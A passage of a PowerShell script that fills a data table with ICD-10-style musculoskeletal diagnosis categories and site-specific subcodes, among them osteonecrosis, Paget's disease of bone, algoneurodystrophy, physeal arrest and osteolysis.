$DiagnosisList.Rows.Add("Other secondary osteonecrosis, ankle and foot","Other secondary osteonecrosis, right toe(s)") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, ankle and foot","Other secondary osteonecrosis, left toe(s)") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, ankle and foot","Other secondary osteonecrosis, unspecified toe(s)") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, other site","Other secondary osteonecrosis, other site") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, multiple sites","Other secondary osteonecrosis, multiple sites") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis","Other osteonecrosis, unspecified bone") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, shoulder","Other osteonecrosis, right shoulder") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, shoulder","Other osteonecrosis, left shoulder") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, shoulder","Other osteonecrosis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, humerus","Other osteonecrosis, right humerus") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, humerus","Other osteonecrosis, left humerus") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, humerus","Other osteonecrosis, unspecified humerus") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis of radius, ulna and carpus","Other osteonecrosis of right radius") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis of radius, ulna and carpus","Other osteonecrosis of left radius") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis of radius, ulna and carpus","Other osteonecrosis of unspecified radius") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis of radius, ulna and carpus","Other osteonecrosis of right ulna") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis of radius, ulna and carpus","Other osteonecrosis of left ulna") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis of radius, ulna and carpus","Other osteonecrosis of unspecified ulna") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis of radius, ulna and carpus","Other osteonecrosis of right carpus") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis of radius, ulna and carpus","Other osteonecrosis of left carpus") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis of radius, ulna and carpus","Other osteonecrosis of unspecified carpus") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, hand and fingers","Other osteonecrosis, right hand") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, hand and fingers","Other osteonecrosis, left hand") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, hand and fingers","Other osteonecrosis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, hand and fingers","Other osteonecrosis, right finger(s)") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, hand and fingers","Other osteonecrosis, left finger(s)") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, hand and fingers","Other osteonecrosis, unspecified finger(s)") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, pelvis and femur","Other osteonecrosis, pelvis") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, pelvis and femur","Other osteonecrosis, right femur") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, pelvis and femur","Other osteonecrosis, left femur") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, pelvis and femur","Other osteonecrosis, unspecified femur") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, tibia and fibula","Other osteonecrosis, right tibia") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, tibia and fibula","Other osteonecrosis, left tibia") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, tibia and fibula","Other osteonecrosis, unspecified tibia") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, tibia and fibula","Other osteonecrosis, right fibula") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, tibia and fibula","Other osteonecrosis, left fibula") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, tibia and fibula","Other osteonecrosis, unspecified fibula") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, ankle, foot and toes","Other osteonecrosis, right ankle") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, ankle, foot and toes","Other osteonecrosis, left ankle") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, ankle, foot and toes","Other osteonecrosis, unspecified ankle") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, ankle, foot and toes","Other osteonecrosis, right foot") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, ankle, foot and toes","Other osteonecrosis, left foot") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, ankle, foot and toes","Other osteonecrosis, unspecified foot") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, ankle, foot and toes","Other osteonecrosis, right toe(s)") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, ankle, foot and toes","Other osteonecrosis, left toe(s)") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, ankle, foot and toes","Other osteonecrosis, unspecified toe(s)") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, other site","Other osteonecrosis, other site") + $null = $DiagnosisList.Rows.Add("Other osteonecrosis, multiple sites","Other osteonecrosis, multiple sites") + $null = $DiagnosisList.Rows.Add("Osteonecrosis, unspecified","Osteonecrosis, unspecified") + $null = $DiagnosisList.Rows.Add("Osteitis deformans [Paget's disease of bone]","Osteitis deformans of skull") + $null = $DiagnosisList.Rows.Add("Osteitis deformans [Paget's disease of bone]","Osteitis deformans of vertebrae") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of shoulder","Osteitis deformans of right shoulder") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of shoulder","Osteitis deformans of left shoulder") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of shoulder","Osteitis deformans of unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of upper arm","Osteitis deformans of right upper arm") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of upper arm","Osteitis deformans of left upper arm") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of upper arm","Osteitis deformans of unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of forearm","Osteitis deformans of right forearm") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of forearm","Osteitis deformans of left forearm") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of forearm","Osteitis deformans of unspecified forearm") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of hand","Osteitis deformans of right hand") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of hand","Osteitis deformans of left hand") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of hand","Osteitis deformans of unspecified hand") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of thigh","Osteitis deformans of right thigh") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of thigh","Osteitis deformans of left thigh") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of thigh","Osteitis deformans of unspecified thigh") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of lower leg","Osteitis deformans of right lower leg") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of lower leg","Osteitis deformans of left lower leg") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of lower leg","Osteitis deformans of unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of ankle and foot","Osteitis deformans of right ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of ankle and foot","Osteitis deformans of left ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of ankle and foot","Osteitis deformans of unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of other bones","Osteitis deformans of other bones") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of multiple sites","Osteitis deformans of multiple sites") + $null = $DiagnosisList.Rows.Add("Osteitis deformans of unspecified bone","Osteitis deformans of unspecified bone") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy","Algoneurodystrophy, unspecified site") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy, shoulder","Algoneurodystrophy, right shoulder") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy, shoulder","Algoneurodystrophy, left shoulder") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy, shoulder","Algoneurodystrophy, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy, upper arm","Algoneurodystrophy, right upper arm") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy, upper arm","Algoneurodystrophy, left upper arm") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy, upper arm","Algoneurodystrophy, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy, forearm","Algoneurodystrophy, right forearm") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy, forearm","Algoneurodystrophy, left forearm") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy, forearm","Algoneurodystrophy, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy, hand","Algoneurodystrophy, right hand") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy, hand","Algoneurodystrophy, left hand") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy, hand","Algoneurodystrophy, unspecified hand") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy, thigh","Algoneurodystrophy, right thigh") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy, thigh","Algoneurodystrophy, left thigh") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy, thigh","Algoneurodystrophy, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy, lower leg","Algoneurodystrophy, right lower leg") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy, lower leg","Algoneurodystrophy, left lower leg") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy, lower leg","Algoneurodystrophy, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy, ankle and foot","Algoneurodystrophy, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy, ankle and foot","Algoneurodystrophy, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy, ankle and foot","Algoneurodystrophy, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy, other site","Algoneurodystrophy, other site") + $null = $DiagnosisList.Rows.Add("Algoneurodystrophy, multiple sites","Algoneurodystrophy, multiple sites") + $null = $DiagnosisList.Rows.Add("Physeal arrest, humerus","Complete physeal arrest, right proximal humerus") + $null = $DiagnosisList.Rows.Add("Physeal arrest, humerus","Complete physeal arrest, left proximal humerus") + $null = $DiagnosisList.Rows.Add("Physeal arrest, humerus","Partial physeal arrest, right proximal humerus") + $null = $DiagnosisList.Rows.Add("Physeal arrest, humerus","Partial physeal arrest, left proximal humerus") + $null = $DiagnosisList.Rows.Add("Physeal arrest, humerus","Complete physeal arrest, right distal humerus") + $null = $DiagnosisList.Rows.Add("Physeal arrest, humerus","Complete physeal arrest, left distal humerus") + $null = $DiagnosisList.Rows.Add("Physeal arrest, humerus","Partial physeal arrest, right distal humerus") + $null = $DiagnosisList.Rows.Add("Physeal arrest, humerus","Partial physeal arrest, left distal humerus") + $null = $DiagnosisList.Rows.Add("Physeal arrest, humerus","Physeal arrest, humerus, unspecified") + $null = $DiagnosisList.Rows.Add("Physeal arrest, forearm","Complete physeal arrest, right distal radius") + $null = $DiagnosisList.Rows.Add("Physeal arrest, forearm","Complete physeal arrest, left distal radius") + $null = $DiagnosisList.Rows.Add("Physeal arrest, forearm","Partial physeal arrest, right distal radius") + $null = $DiagnosisList.Rows.Add("Physeal arrest, forearm","Partial physeal arrest, left distal radius") + $null = $DiagnosisList.Rows.Add("Physeal arrest, forearm","Other physeal arrest of forearm") + $null = $DiagnosisList.Rows.Add("Physeal arrest, forearm","Physeal arrest, forearm, unspecified") + $null = $DiagnosisList.Rows.Add("Physeal arrest, femur","Complete physeal arrest, right proximal femur") + $null = $DiagnosisList.Rows.Add("Physeal arrest, femur","Complete physeal arrest, left proximal femur") + $null = $DiagnosisList.Rows.Add("Physeal arrest, femur","Partial physeal arrest, right proximal femur") + $null = $DiagnosisList.Rows.Add("Physeal arrest, femur","Partial physeal arrest, left proximal femur") + $null = $DiagnosisList.Rows.Add("Physeal arrest, femur","Complete physeal arrest, right distal femur") + $null = $DiagnosisList.Rows.Add("Physeal arrest, femur","Complete physeal arrest, left distal femur") + $null = $DiagnosisList.Rows.Add("Physeal arrest, femur","Partial physeal arrest, right distal femur") + $null = $DiagnosisList.Rows.Add("Physeal arrest, femur","Partial physeal arrest, left distal femur") + $null = $DiagnosisList.Rows.Add("Physeal arrest, femur","Physeal arrest, femur, unspecified") + $null = $DiagnosisList.Rows.Add("Physeal arrest, lower leg","Complete physeal arrest, right proximal tibia") + $null = $DiagnosisList.Rows.Add("Physeal arrest, lower leg","Complete physeal arrest, left proximal tibia") + $null = $DiagnosisList.Rows.Add("Physeal arrest, lower leg","Partial physeal arrest, right proximal tibia") + $null = $DiagnosisList.Rows.Add("Physeal arrest, lower leg","Partial physeal arrest, left proximal tibia") + $null = $DiagnosisList.Rows.Add("Physeal arrest, lower leg","Complete physeal arrest, right distal tibia") + $null = $DiagnosisList.Rows.Add("Physeal arrest, lower leg","Complete physeal arrest, left distal tibia") + $null = $DiagnosisList.Rows.Add("Physeal arrest, lower leg","Partial physeal arrest, right distal tibia") + $null = $DiagnosisList.Rows.Add("Physeal arrest, lower leg","Partial physeal arrest, left distal tibia") + $null = $DiagnosisList.Rows.Add("Physeal arrest, lower leg","Other physeal arrest of lower leg") + $null = $DiagnosisList.Rows.Add("Physeal arrest, lower leg","Physeal arrest, lower leg, unspecified") + $null = $DiagnosisList.Rows.Add("Physeal arrest, other site","Physeal arrest, other site") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth","Other disorders of bone development and growth, unspecified site") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, shoulder","Other disorders of bone development and growth, right shoulder") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, shoulder","Other disorders of bone development and growth, left shoulder") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, shoulder","Other disorders of bone development and growth, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, humerus","Other disorders of bone development and growth, right humerus") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, humerus","Other disorders of bone development and growth, left humerus") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, humerus","Other disorders of bone development and growth, unspecified humerus") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, ulna and radius","Other disorders of bone development and growth, right ulna") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, ulna and radius","Other disorders of bone development and growth, left ulna") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, ulna and radius","Other disorders of bone development and growth, right radius") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, ulna and radius","Other disorders of bone development and growth, left radius") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, ulna and radius","Other disorders of bone development and growth, unspecified ulna and radius") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, hand","Other disorders of bone development and growth, right hand") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, hand","Other disorders of bone development and growth, left hand") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, hand","Other disorders of bone development and growth, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, femur","Other disorders of bone development and growth, right femur") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, femur","Other disorders of bone development and growth, left femur") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, femur","Other disorders of bone development and growth, unspecified femur") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, tibia and fibula","Other disorders of bone development and growth, right tibia") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, tibia and fibula","Other disorders of bone development and growth, left tibia") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, tibia and fibula","Other disorders of bone development and growth, right fibula") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, tibia and fibula","Other disorders of bone development and growth, left fibula") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, tibia and fibula","Other disorders of bone development and growth, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, ankle and foot","Other disorders of bone development and growth, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, ankle and foot","Other disorders of bone development and growth, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, ankle and foot","Other disorders of bone development and growth, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, other site","Other disorders of bone development and growth, other site") + $null = $DiagnosisList.Rows.Add("Other disorders of bone development and growth, multiple sites","Other disorders of bone development and growth, multiple sites") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone","Hypertrophy of bone, unspecified site") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, shoulder","Hypertrophy of bone, right shoulder") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, shoulder","Hypertrophy of bone, left shoulder") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, shoulder","Hypertrophy of bone, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, humerus","Hypertrophy of bone, right humerus") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, humerus","Hypertrophy of bone, left humerus") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, humerus","Hypertrophy of bone, unspecified humerus") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, ulna and radius","Hypertrophy of bone, right ulna") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, ulna and radius","Hypertrophy of bone, left ulna") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, ulna and radius","Hypertrophy of bone, right radius") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, ulna and radius","Hypertrophy of bone, left radius") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, ulna and radius","Hypertrophy of bone, unspecified ulna and radius") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, hand","Hypertrophy of bone, right hand") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, hand","Hypertrophy of bone, left hand") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, hand","Hypertrophy of bone, unspecified hand") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, femur","Hypertrophy of bone, right femur") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, femur","Hypertrophy of bone, left femur") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, femur","Hypertrophy of bone, unspecified femur") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, tibia and fibula","Hypertrophy of bone, right tibia") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, tibia and fibula","Hypertrophy of bone, left tibia") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, tibia and fibula","Hypertrophy of bone, right fibula") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, tibia and fibula","Hypertrophy of bone, left fibula") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, tibia and fibula","Hypertrophy of bone, unspecified tibia and fibula") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, ankle and foot","Hypertrophy of bone, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, ankle and foot","Hypertrophy of bone, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, ankle and foot","Hypertrophy of bone, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, other site","Hypertrophy of bone, other site") + $null = $DiagnosisList.Rows.Add("Hypertrophy of bone, multiple sites","Hypertrophy of bone, multiple sites") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy","Other hypertrophic osteoarthropathy, unspecified site") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy, shoulder","Other hypertrophic osteoarthropathy, right shoulder") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy, shoulder","Other hypertrophic osteoarthropathy, left shoulder") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy, shoulder","Other hypertrophic osteoarthropathy, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy, upper arm","Other hypertrophic osteoarthropathy, right upper arm") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy, upper arm","Other hypertrophic osteoarthropathy, left upper arm") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy, upper arm","Other hypertrophic osteoarthropathy, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy, forearm","Other hypertrophic osteoarthropathy, right forearm") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy, forearm","Other hypertrophic osteoarthropathy, left forearm") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy, forearm","Other hypertrophic osteoarthropathy, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy, hand","Other hypertrophic osteoarthropathy, right hand") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy, hand","Other hypertrophic osteoarthropathy, left hand") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy, hand","Other hypertrophic osteoarthropathy, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy, thigh","Other hypertrophic osteoarthropathy, right thigh") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy, thigh","Other hypertrophic osteoarthropathy, left thigh") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy, thigh","Other hypertrophic osteoarthropathy, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy, lower leg","Other hypertrophic osteoarthropathy, right lower leg") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy, lower leg","Other hypertrophic osteoarthropathy, left lower leg") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy, lower leg","Other hypertrophic osteoarthropathy, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy, ankle and foot","Other hypertrophic osteoarthropathy, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy, ankle and foot","Other hypertrophic osteoarthropathy, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy, ankle and foot","Other hypertrophic osteoarthropathy, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy, other site","Other hypertrophic osteoarthropathy, other site") + $null = $DiagnosisList.Rows.Add("Other hypertrophic osteoarthropathy, multiple sites","Other hypertrophic osteoarthropathy, multiple sites") + $null = $DiagnosisList.Rows.Add("Osteolysis","Osteolysis, unspecified site") + $null = $DiagnosisList.Rows.Add("Osteolysis, shoulder","Osteolysis, right shoulder") + $null = $DiagnosisList.Rows.Add("Osteolysis, shoulder","Osteolysis, left shoulder") + $null = $DiagnosisList.Rows.Add("Osteolysis, shoulder","Osteolysis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Osteolysis, upper arm","Osteolysis, right upper arm") + $null = $DiagnosisList.Rows.Add("Osteolysis, upper arm","Osteolysis, left upper arm") + $null = $DiagnosisList.Rows.Add("Osteolysis, upper arm","Osteolysis, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Osteolysis, forearm","Osteolysis, right forearm") + $null = $DiagnosisList.Rows.Add("Osteolysis, forearm","Osteolysis, left forearm") + $null = $DiagnosisList.Rows.Add("Osteolysis, forearm","Osteolysis, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Osteolysis, hand","Osteolysis, right hand") + $null = $DiagnosisList.Rows.Add("Osteolysis, hand","Osteolysis, left hand") + $null = $DiagnosisList.Rows.Add("Osteolysis, hand","Osteolysis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Osteolysis, thigh","Osteolysis, right thigh") + $null = $DiagnosisList.Rows.Add("Osteolysis, thigh","Osteolysis, left thigh") + $null = $DiagnosisList.Rows.Add("Osteolysis, thigh","Osteolysis, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Osteolysis, lower leg","Osteolysis, right lower leg") + $null = $DiagnosisList.Rows.Add("Osteolysis, lower leg","Osteolysis, left lower leg") + $null = $DiagnosisList.Rows.Add("Osteolysis, lower leg","Osteolysis, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Osteolysis, ankle and foot","Osteolysis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteolysis, ankle and foot","Osteolysis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteolysis, ankle and foot","Osteolysis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteolysis, other site","Osteolysis, other site") + $null = $DiagnosisList.Rows.Add("Osteolysis, multiple sites","Osteolysis, multiple sites") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis","Osteopathy after poliomyelitis, unspecified site") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis, shoulder","Osteopathy after poliomyelitis, right shoulder") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis, shoulder","Osteopathy after poliomyelitis, left shoulder") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis, shoulder","Osteopathy after poliomyelitis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis, upper arm","Osteopathy after poliomyelitis, right upper arm") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis, upper arm","Osteopathy after poliomyelitis, left upper arm") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis, upper arm","Osteopathy after poliomyelitis, unspecified upper arm") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis, forearm","Osteopathy after poliomyelitis, right forearm") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis, forearm","Osteopathy after poliomyelitis, left forearm") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis, forearm","Osteopathy after poliomyelitis, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis, hand","Osteopathy after poliomyelitis, right hand") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis, hand","Osteopathy after poliomyelitis, left hand") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis, hand","Osteopathy after poliomyelitis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis, thigh","Osteopathy after poliomyelitis, right thigh") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis, thigh","Osteopathy after poliomyelitis, left thigh") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis, thigh","Osteopathy after poliomyelitis, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis, lower leg","Osteopathy after poliomyelitis, right lower leg") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis, lower leg","Osteopathy after poliomyelitis, left lower leg") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis, lower leg","Osteopathy after poliomyelitis, unspecified lower leg") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis, ankle and foot","Osteopathy after poliomyelitis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis, ankle and foot","Osteopathy after poliomyelitis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis, ankle and foot","Osteopathy after poliomyelitis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis, other site","Osteopathy after poliomyelitis, other site") + $null = $DiagnosisList.Rows.Add("Osteopathy after poliomyelitis, multiple sites","Osteopathy after poliomyelitis, multiple sites") + $null = $DiagnosisList.Rows.Add("Major osseous defect","Major osseous defect, unspecified site") + $null = $DiagnosisList.Rows.Add("Major osseous defect, shoulder region","Major osseous defect, right shoulder region") + $null = $DiagnosisList.Rows.Add("Major osseous defect, shoulder region","Major osseous defect, left shoulder region") + $null = $DiagnosisList.Rows.Add("Major osseous defect, shoulder region","Major osseous defect, unspecified shoulder region") + $null = $DiagnosisList.Rows.Add("Major osseous defect, humerus","Major osseous defect, right humerus") + $null = $DiagnosisList.Rows.Add("Major osseous defect, humerus","Major osseous defect, left humerus") + $null = $DiagnosisList.Rows.Add("Major osseous defect, humerus","Major osseous defect, unspecified humerus") + $null = $DiagnosisList.Rows.Add("Major osseous defect, forearm","Major osseous defect, right forearm") + $null = $DiagnosisList.Rows.Add("Major osseous defect, forearm","Major osseous defect, left forearm") + $null = $DiagnosisList.Rows.Add("Major osseous defect, forearm","Major osseous defect, unspecified forearm") + $null = $DiagnosisList.Rows.Add("Major osseous defect, hand","Major osseous defect, right hand") + $null = $DiagnosisList.Rows.Add("Major osseous defect, hand","Major osseous defect, left hand") + $null = $DiagnosisList.Rows.Add("Major osseous defect, hand","Major osseous defect, unspecified hand") + $null = $DiagnosisList.Rows.Add("Major osseous defect, pelvic region and thigh","Major osseous defect, right pelvic region and thigh") + $null = $DiagnosisList.Rows.Add("Major osseous defect, pelvic region and thigh","Major osseous defect, left pelvic region and thigh") + $null = $DiagnosisList.Rows.Add("Major osseous defect, pelvic region and thigh","Major osseous defect, unspecified pelvic region and thigh") + $null = $DiagnosisList.Rows.Add("Major osseous defect, lower leg","Major osseous defect, right lower leg") + $null = $DiagnosisList.Rows.Add("Major osseous defect, lower leg","Major osseous 